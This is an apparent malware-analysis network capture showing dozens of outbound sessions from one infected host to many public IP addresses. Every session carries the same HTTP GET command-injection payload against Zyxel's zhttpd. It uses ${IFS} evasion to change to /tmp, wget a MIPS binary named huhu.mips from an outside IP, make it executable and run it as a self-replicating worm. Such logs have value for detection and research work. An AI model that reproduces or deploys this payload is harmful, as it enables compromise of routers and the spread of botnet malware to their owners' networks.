                                              Jan 29, 2024 07:03:35.725929022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              836192.168.2.1434952203.101.216.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.725987911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              837192.168.2.1446820176.155.23.18443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.726032972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              838192.168.2.144323879.69.252.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.726039886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              839192.168.2.1450124200.243.115.70443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.726070881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              840192.168.2.145815066.159.135.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.726104021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              841192.168.2.1436914118.64.78.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.726142883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              842192.168.2.1453090115.172.181.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.726176023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              843192.168.2.1451198190.135.248.225443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.726227999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              844192.168.2.144553473.187.134.72443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.726262093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              845192.168.2.143766079.199.9.253443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.726303101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              846192.168.2.1438746109.34.174.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.726330042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              847192.168.2.144964414.25.245.67443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.726383924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              848192.168.2.1452050179.77.52.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.726414919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              849192.168.2.1440066192.102.71.193443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.726435900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              850192.168.2.144953469.164.181.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.726473093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              851192.168.2.143869049.195.201.214443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.726490974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              852192.168.2.1451758145.52.153.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.726533890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              853192.168.2.143686084.249.208.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.726586103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              854192.168.2.144676495.15.47.199443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.726620913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              855192.168.2.145473875.75.192.18443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.726634979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              856192.168.2.1449978166.248.80.10443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.726690054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              857192.168.2.1457380110.103.131.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.726722002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              858192.168.2.145942672.143.209.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.726751089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              859192.168.2.143989617.186.193.233443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.726783991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              860192.168.2.145871252.87.162.208443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.726826906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              861192.168.2.143641039.153.130.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.726864100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              862192.168.2.143369466.120.82.151443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.726891994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              863192.168.2.143833047.178.229.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.726933956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              864192.168.2.143363695.125.226.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.726974964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              865192.168.2.1457384210.193.147.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.727015972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              866192.168.2.14385925.193.34.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.727041006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              867192.168.2.1450376210.196.205.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.727082968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              868192.168.2.14570581.161.12.214443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.727122068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              869192.168.2.1450674160.120.147.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.727159977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              870192.168.2.1440840197.71.135.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.727183104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              871192.168.2.143606012.135.0.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.727215052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              872192.168.2.14517804.149.22.73443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.727257013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              873192.168.2.1443166205.34.84.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.727289915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              874192.168.2.144937825.84.58.46443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.727339029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              875192.168.2.1451060158.246.253.174443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.727361917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              876192.168.2.1454304197.125.148.169443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.727396965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              877192.168.2.1434796165.67.37.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.727433920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              878192.168.2.1441176128.44.47.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.727493048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              879192.168.2.1444808184.231.228.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.727521896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              880192.168.2.1454712219.8.206.43443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.727535963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              881192.168.2.1444452101.86.154.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.727581024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              882192.168.2.144043027.126.91.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.727592945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              883192.168.2.1440880135.176.235.167443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.727659941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              884192.168.2.1444052177.63.155.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.727684975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              885192.168.2.143545280.197.71.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.727705002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              886192.168.2.1440878118.156.217.78443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.727742910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              887192.168.2.145137888.173.129.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.727780104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              888192.168.2.1442392174.3.63.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.727802992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              889192.168.2.1437444109.225.252.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.727866888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              890192.168.2.1433150107.104.135.65443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.727880001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              891192.168.2.144475262.76.238.214443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.727924109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              892192.168.2.145061442.245.251.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.727962971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              893192.168.2.1434660121.70.149.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.727978945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              894192.168.2.1447486216.71.203.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.728005886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              895192.168.2.1440712138.253.177.71443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.728049994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              896192.168.2.143362480.61.127.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.728081942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              897192.168.2.144168420.218.234.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.728127956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              898192.168.2.14588901.93.132.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:35.728157043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              899192.168.2.1449392177.177.31.240443
                                              TimestampBytes transferredDirectionData
